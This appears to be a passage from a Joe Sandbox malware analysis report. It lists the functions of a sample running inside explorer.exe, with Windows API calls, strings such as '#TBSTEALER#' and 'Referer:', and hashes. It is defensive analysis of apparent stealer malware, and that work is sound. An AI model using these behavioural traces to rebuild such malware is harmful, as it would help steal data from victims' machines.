Instruction Fuzzy Hash: F29169B0504609AFEB318F29CC84AAEBBBDFF09348F504569F525DB1A1D7309848CF91

Uniqueness

Uniqueness Score: -1,00%

Function 0154516F, Relevance: 12.2, APIs: 7, Strings: 1, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 015451FF

Part of subcall function 01564C96: memset.NTDLL ref: 01564CD5
Part of subcall function 01564C96: memcpy.NTDLL(?,?,?,00000000,00000000,?,?), ref: 01564CE2

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

HeapFree.KERNEL32(00000000,?,?), ref: 0154539E
HeapFree.KERNEL32(00000000,0159942C,0159942C), ref: 015453D7
HeapFree.KERNEL32(00000000,00000000,0159B2F5), ref: 015453E6
HeapFree.KERNEL32(00000000,?,00000000), ref: 015453F8
HeapFree.KERNEL32(00000000,?), ref: 0154540E
HeapFree.KERNEL32(00000000,00000000), ref: 0154541D

Part of subcall function 0155783A: RtlAllocateHeap.NTDLL(00000000,00000030,00000000), ref: 01557877
Part of subcall function 0155783A: HeapFree.KERNEL32(00000000,00000000), ref: 01557946

Strings

EMPTY, xrefs: 01545174

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Free$Allocatememcpymemsetwsprintf
String ID: EMPTY
API String ID: 1607579117-1696604233
Opcode ID: 73c970cf3ff1c3ba522173a0e8da5021294309dbf261bc2586ca0e9be8c5f85d
Instruction ID: 47c16fc19579bf8e67d8621c1185ee0799deb2e8c0ce40e5b4e3b22bb302ed7f
Opcode Fuzzy Hash: 73c970cf3ff1c3ba522173a0e8da5021294309dbf261bc2586ca0e9be8c5f85d
Instruction Fuzzy Hash: BF71AF31115305AFDB219F68EC46E1A7BE9FB89318F070828F6249F224D771DC19EB62

Uniqueness

Uniqueness Score: -1,00%

Function 015459C9, Relevance: 12.1, APIs: 8, Instructions: 103filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0154722E: memset.NTDLL ref: 01547256
Part of subcall function 0154722E: CloseHandle.KERNEL32(000000FF), ref: 0154730F

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?,?), ref: 01545A0D
CloseHandle.KERNEL32(?), ref: 01545A87

Part of subcall function 01561F64: lstrlen.KERNEL32(?,?,00000000,?,?,?,01545A24,?,?,?,?), ref: 01561F74

lstrlenW.KERNEL32(?,?,?,?,?), ref: 01545A30
UnmapViewOfFile.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 01545A75
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01545AA1
wsprintfA.USER32 ref: 01545AB2
lstrlen.KERNEL32(00000000), ref: 01545ABC
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01545AD2

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: lstrlen$CloseFileHandleHeapView$AllocateFreeUnmapmemsetwsprintf
String ID:
API String ID: 1835461794-0
Opcode ID: 9b083e57a6f64984485f15bab4680edc386ca2edcb07e6fe3f8f8eaddb7715fe
Instruction ID: 811a69b0d7e573f41db3c3941d6a39a4f90abd727c1b36f2e45f84146f66aed8
Opcode Fuzzy Hash: 9b083e57a6f64984485f15bab4680edc386ca2edcb07e6fe3f8f8eaddb7715fe
Instruction Fuzzy Hash: 0531893110121AEFDB22EF69DC89EAF3B79FF49755B010010F9129F124EB708915EBA1

Uniqueness

Uniqueness Score: -1,00%

Function 015567AF, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 81stringCOMMON

Download Yara Rule

APIs

Part of subcall function 01544097: memset.NTDLL ref: 0154409E
Part of subcall function 01544097: CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 015440B6
Part of subcall function 01544097: GetFileSize.KERNEL32(00000000,00000000), ref: 015440C5
Part of subcall function 01544097: CreateFileMappingA.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 015440D6
Part of subcall function 01544097: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 015440E9

Part of subcall function 01543D22: LocalAlloc.KERNEL32(00000040,-00000082,0154BFC3), ref: 01543D2A

memcpy.NTDLL(00000000,?,?,?,00000000,0156E44C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 015567E4
lstrlen.KERNEL32(#TBSTEALER#,?,00000000,0156E44C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 015567FF
lstrcpy.KERNEL32(00000000,#TBSTEALER#), ref: 01556815
lstrcat.KERNEL32(00000000,00000000), ref: 0155681E
lstrlen.KERNEL32(?,?,00000000,0156E44C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 01556827
LocalFree.KERNEL32(00000000,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 0155684F
LocalFree.KERNEL32(00000000,00000000,0156EF14,00000000,0156EF2C,?,?,?,?,01556A0A,00000000,00000000,00000000), ref: 01556875

Strings

#TBSTEALER#, xrefs: 015567F9, 015567FE, 01556811

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$Local$CreateFreelstrlen$AllocMappingSizeViewlstrcatlstrcpymemcpymemset
String ID: #TBSTEALER#
API String ID: 1944120096-240897058
Opcode ID: c09771612e25351aa45f742f97998fde1a363466f56dff5d3f73347434ed6fee
Instruction ID: 88e72a3dd0da08e217b7abdcf5afcc7ec87065e3ff8f5dabc161b1b396f05397
Opcode Fuzzy Hash: c09771612e25351aa45f742f97998fde1a363466f56dff5d3f73347434ed6fee
Instruction Fuzzy Hash: 5321807490120AEFDB20AFA8DC85E5EBFB8FF54354B010425F915AF125DB31D918DBA0

Uniqueness

Uniqueness Score: -1,00%

Function 015419E2, Relevance: 12.1, APIs: 8, Instructions: 74stringthreadsleepCOMMON

Download Yara Rule

APIs

Part of subcall function 01544626: RtlAllocateHeap.NTDLL(00000000,0159A213), ref: 01544677

lstrlenW.KERNEL32(00000000,0159B69C,?,?,00000000,?,?,0159A213,?,?), ref: 01541A26
lstrcpyW.KERNEL32(-00000008), ref: 01541A31

Part of subcall function 01562322: HeapFree.KERNEL32(00000000,?), ref: 01562392

Part of subcall function 0154157B: HeapFree.KERNEL32(00000000,?,015606F9), ref: 01541587

Part of subcall function 0156156F: lstrcpyW.KERNEL32(00000000,00000008), ref: 015615A4
Part of subcall function 0156156F: lstrcpy.KERNEL32(00000000), ref: 015615EE
Part of subcall function 0156156F: GetTickCount.KERNEL32(00000104), ref: 0156161C

SuspendThread.KERNEL32(00000000,0159A213,?,?), ref: 01541A63
CreateEventA.KERNEL32(01599084,00000001,00000000), ref: 01541A78
SetEvent.KERNEL32(00000000), ref: 01541A85
CloseHandle.KERNEL32(00000000), ref: 01541A8C
Sleep.KERNEL32(000001F4), ref: 01541A98
ResumeThread.KERNEL32(00000000), ref: 01541ABC

Part of subcall function 015620A0: lstrlenW.KERNEL32(?,?,?,?,?,01541A1E,?,?,00000000,?,?,0159A213,?,?), ref: 015620A9
Part of subcall function 015620A0: memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,01541A1E,?,?,00000000,?,?,0159A213), ref: 015620D3
Part of subcall function 015620A0: memset.NTDLL ref: 015620E7

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heaplstrcpy$EventFreeThreadlstrlen$AllocateCloseCountCreateHandleResumeSleepSuspendTickmemcpymemset
String ID:
API String ID: 994341394-0
Opcode ID: 0a9914e44d79b0ce297c0c39e130b1b993f695447d7e33eb52d673b2dbe44a36
Instruction ID: e86308f7ff0add1445505039491e2b84b9bf29123fea7b68ce5fae7b3cdc6134
Opcode Fuzzy Hash: 0a9914e44d79b0ce297c0c39e130b1b993f695447d7e33eb52d673b2dbe44a36
Instruction Fuzzy Hash: DA21A43650151ABFDB21EBA9EC89E9E7BBDFF49314B024010F6119F024C771994AEBE1

Uniqueness

Uniqueness Score: -1,00%

Function 01551035, Relevance: 11.6, APIs: 9, Instructions: 339COMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(?,?,0156EB34,?,?,?), ref: 015510FB
LocalFree.KERNEL32(00000000,?,0156EB34,?,?,00000000), ref: 015511B7
LocalFree.KERNEL32(?,?,80000001,01598164,00000000,?,000007FF,80000001,00000000), ref: 015511C0
LocalFree.KERNEL32(?,?,00000000), ref: 01551279
LocalFree.KERNEL32(00000000,?,0156EB34,?,?,00000000), ref: 015512E1
LocalFree.KERNEL32(?), ref: 015512EC
memset.NTDLL ref: 0155134D
wsprintfA.USER32 ref: 01551390
LocalFree.KERNEL32(00000000), ref: 01551408

Part of subcall function 01550EF7: lstrlen.KERNEL32(?), ref: 01550F0A
Part of subcall function 01550EF7: LocalAlloc.KERNEL32(00000040,00000001), ref: 01550F14
Part of subcall function 01550EF7: lstrcpy.KERNEL32(00000000,?), ref: 01550F1E
Part of subcall function 01550EF7: LocalFree.KERNEL32(?), ref: 01550F39

Part of subcall function 01563991: LocalReAlloc.KERNEL32(80000001,8000000B,00000002,80000001,0156E08C,?,015513F2,?,0156EB34,?), ref: 015639B1
Part of subcall function 01563991: memcpy.NTDLL(80000001,00000000,00000001,?,015513F2,?,0156EB34,?), ref: 015639CF

Part of subcall function 01563991: LocalAlloc.KERNEL32(00000040,8000000B,80000001,0156E08C,?,015513F2,?,0156EB34,?), ref: 015639BF

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Local$Free$Alloc$lstrcpylstrlenmemcpymemsetwsprintf
String ID:
API String ID: 1007520009-0
Opcode ID: 6fc0db9222b705d9a453579e428e2ee03696286e767055ebdfe68954a59eeefa
Instruction ID: d02f2a19743ed2e0ec4a66a796e2b603ab9f2967b131ea988ae3f0e24698c4c9
Opcode Fuzzy Hash: 6fc0db9222b705d9a453579e428e2ee03696286e767055ebdfe68954a59eeefa
Instruction Fuzzy Hash: 44C15772C0022AAFDF51DFA8CC46AEEBBB9FF49710F05041AEA14AB150D7319A45DBD0

Uniqueness

Uniqueness Score: -1,00%

Function 01550C3E, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 208memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00003000), ref: 01550CDE
wsprintfA.USER32 ref: 01550DF8
memcpy.NTDLL(00000000,00000001,00003000), ref: 01550E42
InterlockedExchange.KERNEL32(01598F50,00000000), ref: 01550E5D
HeapFree.KERNEL32(00000000,00000001), ref: 01550EA8

Strings

Referer: , xrefs: 01550D03, 01550D0A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateExchangeFreeInterlockedmemcpywsprintf
String ID: Referer:
API String ID: 257421191-1419887270
Opcode ID: f2835193dc876ba91b138e64ba783ac5b41becbe4f881c414be7964c90bf6734
Instruction ID: 8712626ab306a297e125629ad41f0c32c7c502c1c524c70b8671d5e3d71cbdcf
Opcode Fuzzy Hash: f2835193dc876ba91b138e64ba783ac5b41becbe4f881c414be7964c90bf6734
Instruction Fuzzy Hash: 9B716A71A0020EEFDF209FA8CC55BAE7BB9BF44304F15442AF915AB240D7749A54DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 01543B06, Relevance: 10.7, APIs: 7, Instructions: 184memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 01544626: RtlAllocateHeap.NTDLL(00000000,0159A213), ref: 01544677

RtlAllocateHeap.NTDLL(00000000,00010000,0159A21B), ref: 01543B64
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01543C63
wsprintfA.USER32 ref: 01543C77
lstrlen.KERNEL32(?,00000000), ref: 01543C84
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01543CD5
wsprintfA.USER32 ref: 01543CE7
lstrlen.KERNEL32(00000000,00000000), ref: 01543CF2

Part of subcall function 01552658: lstrlen.KERNEL32(?,00000000,00000000,?,?,01541D4B,0000010D,00000000), ref: 01552689
Part of subcall function 01552658: RtlAllocateHeap.NTDLL(00000000,01541D4B,00000000), ref: 015526A0
Part of subcall function 01552658: memcpy.NTDLL(0000000C,?,00000000,?,?,01541D4B,0000010D), ref: 015526CB
Part of subcall function 01552658: memcpy.NTDLL(0000000C,00000000,01541D4B,?,?,01541D4B), ref: 015526E6
Part of subcall function 01552658: CallNamedPipeA.KERNEL32(00000000,01541D4B,?,0000000C,00000119,00000001), ref: 01552704
Part of subcall function 01552658: GetLastError.KERNEL32(?,?,01541D4B), ref: 0155270E
Part of subcall function 01552658: HeapFree.KERNEL32(00000000,00000000), ref: 01552737

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Allocate$lstrlen$memcpywsprintf$CallErrorFreeLastNamedPipe
String ID:
API String ID: 4117674275-0
Opcode ID: 3cdf0a38dd9e9383e7a8b1b61a0d6009927ae8d0c8948bb98c90662291ae67e6
Instruction ID: 4638ccb07d9510e38857ffdcdc860f199657cd7e3a2db8876941185aeaad144f
Opcode Fuzzy Hash: 3cdf0a38dd9e9383e7a8b1b61a0d6009927ae8d0c8948bb98c90662291ae67e6
Instruction Fuzzy Hash: 59514AB190021AFFEF619FA9CC85DBEBBB9FF44348F11006AE614AB220D7714D549B61

Uniqueness

Uniqueness Score: -1,00%

Function 01545B7D, Relevance: 10.7, APIs: 7, Instructions: 180memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 01545756: WaitForSingleObject.KERNEL32(00000000), ref: 01545880
Part of subcall function 01545756: HeapFree.KERNEL32(00000000,00000103), ref: 015458A9
Part of subcall function 01545756: HeapFree.KERNEL32(00000000,?), ref: 015458B9

lstrcmp.KERNEL32(?,?), ref: 01545BF2
memset.NTDLL ref: 01545C55
GetCurrentThreadId.KERNEL32(?,00000000,?,?,?), ref: 01545CD5
GetCurrentThread.KERNEL32 ref: 01545CE2
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 01545D56
wsprintfA.USER32 ref: 01545D67
lstrlen.KERNEL32(00000000,00000000), ref: 01545D73

Part of subcall function 015608FA: lstrlen.KERNEL32(?,00000000,01598A44,?,01541B02,?), ref: 01560904
Part of subcall function 015608FA: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 0156092F
Part of subcall function 015608FA: lstrcat.KERNEL32(00000000,?), ref: 01560975

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$CurrentFreeThreadlstrlen$AllocateObjectSingleWaitlstrcatlstrcmpmemsetwsprintf
String ID:
API String ID: 1334506415-0
Opcode ID: be3e85943f95d5d3b06e2d25b158fc65ff1ff2d27cd0488ecf7ed41527ae3f09
Instruction ID: f900fea3d8e0ae5dabf31d82c73dbcf212b46da3143880a9da2515066471f649
Opcode Fuzzy Hash: be3e85943f95d5d3b06e2d25b158fc65ff1ff2d27cd0488ecf7ed41527ae3f09
Instruction Fuzzy Hash: D9614A71911119AFCF21DFA4DC88EAEBBB9FF04304F0541A5E619EB224E7319A84DF90

Uniqueness

Uniqueness Score: -1,00%

Function 0156A06E, Relevance: 10.6, APIs: 7, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8f1a04a10997e04fd29a55bc54106962b25213369e6b9e12952baf9f62dd571
Instruction ID: c77725817aadadebc684e2f807087709a24a3d741592741ef520ebf665ddb737
Opcode Fuzzy Hash: e8f1a04a10997e04fd29a55bc54106962b25213369e6b9e12952baf9f62dd571
Instruction Fuzzy Hash: B731BC70500B05EFE3319F698C8896BBBECFB857A4F100A1EF2A6DB190D7719445CBA1

Uniqueness

Uniqueness Score: -1,00%

Function 01542CD8, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000), ref: 01542D6D
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01542D81
lstrcpy.KERNEL32(00000004,00000000), ref: 01542D9F
HeapFree.KERNEL32(00000000,00000000,Scr), ref: 01542DDE

Strings

Scr, xrefs: 01542DA9, 01542DAE, 01542DC4, 01542E00
W, xrefs: 01542CE5

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateFreelstrcpylstrlen
String ID: Scr$W
API String ID: 1437807458-3281027876
Opcode ID: 53cc2020991e585984b75a9f71a00c3591ff58c2c33949face02c235ced4ed48
Instruction ID: 079dfd8f4e20e7d85a0122ad55052c94c2e95ed8d4fec482457a8b81a26ba560
Opcode Fuzzy Hash: 53cc2020991e585984b75a9f71a00c3591ff58c2c33949face02c235ced4ed48
Instruction Fuzzy Hash: BB31BC30500228FFEB218F68EC48FAE7EB9FF45754F164016F514AF250D6718A46DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 0154F916, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0154F96E
RtlReAllocateHeap.NTDLL(00000000,00000000,?), ref: 0154F98E
memcpy.NTDLL(00000000,?,?,?,?,?,?,?,?,?,?,?,?,01550767), ref: 0154F9AA
HeapFree.KERNEL32(00000000,00000000), ref: 0154F9EA
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0154FA07

Strings

W, xrefs: 0154FA33

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$Allocatememcpy$Free
String ID: W
API String ID: 1024222012-655174618
Opcode ID: 8e018cd58782b4b29f85070407983c75d772a6b77d1bbf7a48aa7cf849215d96
Instruction ID: ce70b1c6a03adc0ecc473a7d8648ca66870a07acdd8d70011e8348382b4ac9ba
Opcode Fuzzy Hash: 8e018cd58782b4b29f85070407983c75d772a6b77d1bbf7a48aa7cf849215d96
Instruction Fuzzy Hash: 9141AD7690020AFFEF11CF9DCC84AAE7BB9FF44348F158026E9149B210E7719E149BA1

Uniqueness

Uniqueness Score: -1,00%

Function 01546556, Relevance: 10.6, APIs: 7, Instructions: 106stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0154650C: RtlEnterCriticalSection.NTDLL(01599448), ref: 01546514
Part of subcall function 0154650C: RtlLeaveCriticalSection.NTDLL(01599448), ref: 01546529
Part of subcall function 0154650C: InterlockedIncrement.KERNEL32(00000014), ref: 01546542

lstrlen.KERNEL32(00000008,?,?,?,01544F00,?), ref: 015465B4
HeapFree.KERNEL32(00000000,00000000), ref: 015465D8
memcpy.NTDLL(00000000,?,01544F00,?,?,?,01544F00,?), ref: 015465EC
lstrcpy.KERNEL32(00000018,00000008), ref: 01546616
RtlEnterCriticalSection.NTDLL(01599448), ref: 01546621
RtlLeaveCriticalSection.NTDLL(01599448), ref: 0154667A

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterLeave$FreeHeapIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 38435513-0
Opcode ID: 51b907ed4fc4985477c3c0271ddf95f892e4855379d7f1ebb178c086b43acebf
Instruction ID: 1802bbc4a62417c8ade4443e28bc87af2b692eed472d4e963c7249a2506a7ebe
Opcode Fuzzy Hash: 51b907ed4fc4985477c3c0271ddf95f892e4855379d7f1ebb178c086b43acebf
Instruction Fuzzy Hash: FC418AB5500305EFDF228F68D884BAA7FF9FB45318F024429E9289F215DB71D918AB91

Uniqueness

Uniqueness Score: -1,00%

Function 015470C3, Relevance: 10.6, APIs: 7, Instructions: 91memorystringsynchronizationCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 0154710D
memset.NTDLL ref: 0154712A
WaitForSingleObject.KERNEL32(00000000), ref: 01547146
GetDriveTypeW.KERNEL32(?), ref: 01547154
lstrlenW.KERNEL32(?), ref: 01547160
lstrlenW.KERNEL32(?), ref: 0154718D
HeapFree.KERNEL32(00000000,?), ref: 015471A6

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heaplstrlen$AllocateDriveFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 855039025-0
Opcode ID: a5aca8cf12793a193cf02f085429bf8455a553c5b210c197793e4744127663d2
Instruction ID: 7a7ea646bb2181322df743022e534b83408d2481a8cb574467ad754041e259e8
Opcode Fuzzy Hash: a5aca8cf12793a193cf02f085429bf8455a553c5b210c197793e4744127663d2
Instruction Fuzzy Hash: F4314F36801108FFDB219BA9DC49CEEBF7AFF49364B114015F114EB121D731AA19EBA1

Uniqueness

Uniqueness Score: -1,00%

Function 0155FEBB, Relevance: 10.6, APIs: 7, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 0155FF06
WaitForSingleObject.KERNEL32(000000C8), ref: 0155FF2B
SetFilePointer.KERNEL32(00000008,00000000,00000000,00000002), ref: 0155FF74
WriteFile.KERNEL32(00000008,00001388,?,00000002,00000000), ref: 0155FF89
SetEndOfFile.KERNEL32(00000008), ref: 0155FF96
GetLastError.KERNEL32 ref: 0155FFA2
CloseHandle.KERNEL32(00000008), ref: 0155FFAE

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: File$ErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2772011183-0
Opcode ID: 4c6138b1ce7daeb14d720093a408710cb94b5af335f986dd09487ab24c7f96a7
Instruction ID: 2cb8feed505324beaa4c936a22acb215a48b52f7657bf181e7aa3430fca7bfd1
Opcode Fuzzy Hash: 4c6138b1ce7daeb14d720093a408710cb94b5af335f986dd09487ab24c7f96a7
Instruction Fuzzy Hash: C1316E71900209FFEB61CFA8DD4ABAE7BB9FF05315F104156F920AA1E0D7704A54DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 015418EA, Relevance: 10.6, APIs: 7, Instructions: 89memorystringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 015418FB
RtlAllocateHeap.NTDLL(00000000,00000011), ref: 01541922
GetTickCount.KERNEL32 ref: 01541939
wsprintfA.USER32 ref: 01541949
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 01541995
lstrlen.KERNEL32(00000000), ref: 0154199F
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 015419C9

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateCountFreeHeaderImageTicklstrlenwsprintf
String ID:
API String ID: 2049169315-0
Opcode ID: c074e47b0a54f7536b0b708e613f6e40bee0d432834a2f7a067074d42e45e82e
Instruction ID: dd207bc9c172ba21bcbbfd631b98b2636ccfd6aa467ed85f4801bacaea36df78
Opcode Fuzzy Hash: c074e47b0a54f7536b0b708e613f6e40bee0d432834a2f7a067074d42e45e82e
Instruction Fuzzy Hash: BC218B75401218FFDB219FA5DC88DAF7FACFF463A5B024025FA16CA114D7718E48ABA1

Uniqueness

Uniqueness Score: -1,00%

Function 01552658, Relevance: 10.6, APIs: 7, Instructions: 83memorystringpipeCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000000,?,?,01541D4B,0000010D,00000000), ref: 01552689
RtlAllocateHeap.NTDLL(00000000,01541D4B,00000000), ref: 015526A0
memcpy.NTDLL(0000000C,?,00000000,?,?,01541D4B,0000010D), ref: 015526CB
memcpy.NTDLL(0000000C,00000000,01541D4B,?,?,01541D4B), ref: 015526E6
CallNamedPipeA.KERNEL32(00000000,01541D4B,?,0000000C,00000119,00000001), ref: 01552704
GetLastError.KERNEL32(?,?,01541D4B), ref: 0155270E
HeapFree.KERNEL32(00000000,00000000), ref: 01552737

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heapmemcpy$AllocateCallErrorFreeLastNamedPipelstrlen
String ID:
API String ID: 2237239663-0
Opcode ID: d1e565e4993ad76b7d1415c92b24d94d93763d40695770d7ee8184ae06b84784
Instruction ID: 6399f96071c1c8950e030e7a74579e44befe32de5288904fff0ce06f9461f823
Opcode Fuzzy Hash: d1e565e4993ad76b7d1415c92b24d94d93763d40695770d7ee8184ae06b84784
Instruction Fuzzy Hash: 5131A07680020AEFDB51DFA8DC44AAB7BB9FF04314F004426FD15EB250E7709A18DBA1

Uniqueness

Uniqueness Score: -1,00%

Function 015429CA, Relevance: 10.6, APIs: 7, Instructions: 62memorystringthreadCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(01542AC2,00000000,00000000,00000008,?,?,?,01542AC2,015471B6,00000000,?), ref: 015429E1
RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 015429F4
lstrcpy.KERNEL32(00000008,01542AC2), ref: 01542A16
CreateThread.KERNEL32(00000000,00000000,01542981,00000000,00000000,00000000), ref: 01542A2E
CloseHandle.KERNEL32(00000000), ref: 01542A39
GetLastError.KERNEL32(?,?,?,01542AC2,015471B6,00000000,?), ref: 01542A41
HeapFree.KERNEL32(00000000,00000000), ref: 01542A52

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: Heap$AllocateCloseCreateErrorFreeHandleLastThreadlstrcpylstrlen
String ID:
API String ID: 521669393-0
Opcode ID: f4c02d81ea8422074ece176256923d5a6d6eb084ab0a861660ea91df7738f819
Instruction ID: abadbd4d0dab6e325dba48f9f64dc2d9945669ed80fdab00cd8598557a31517b
Opcode Fuzzy Hash: f4c02d81ea8422074ece176256923d5a6d6eb084ab0a861660ea91df7738f819
Instruction Fuzzy Hash: DB115175501219EFEB20CFA9E8898AE7FB8FB04354B014429F919DB210D7B19D489BA0

Uniqueness

Uniqueness Score: -1,00%

Function 01563F8D, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(01598D7C), ref: 01563F9F
_allshl.NTDLL ref: 01563FE3
_aullshr.NTDLL ref: 01563FF0
LocalFree.KERNEL32(?), ref: 01564007
RtlLeaveCriticalSection.NTDLL(01598D5C), ref: 0156401E

Strings

@, xrefs: 01564010

Memory Dump Source

Source File: 00000002.00000002.1544175800.01541000.00000020.sdmp, Offset: 01541000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1541000_explorer.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocal_allshl_aullshr
String ID: @
API String ID: 868912405-2766056989
Opcode ID: 53a35adc4e103d9ca0e83622fc81099d8cb95b758add658fdbd88fba155847f1
Instruction ID: 23252f1d16951544f8e5a73bcab2574429b02d90585356d206bab561e47f657f
Opcode Fuzzy Hash: 53a35adc4e103d9ca0e83622fc81099d8cb95b758add658fdbd88fba155847f1
Instruction Fuzzy Hash: 3611EE31900214EBCF22DFACC88499EBBF9FF84250F058465E9999F211D3349A40DBE0

Uniqueness

Uniqueness Score: -1,00%

Function 01551AE9, Relevance: 10.6, APIs: 7, Instructions: 58memorystringsleepCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,?,?,?,01553F83,00000000,?), ref: 01551AFB
RtlEnterCriticalSection.NTDLL(01599448), ref: 01551B12
Sleep.KERNEL32(0000000A,?,?,01553F83,00000000,?), ref: 01551B1C
RtlAllocateHeap.NTDLL(01598F60,00000001), ref: 01551B44
lstrcpy.KERNEL32(00000000,00000000), ref: 01551B54
SetEvent.KERNEL32(?,?,01553F83,00000000,?), ref: 01551B66
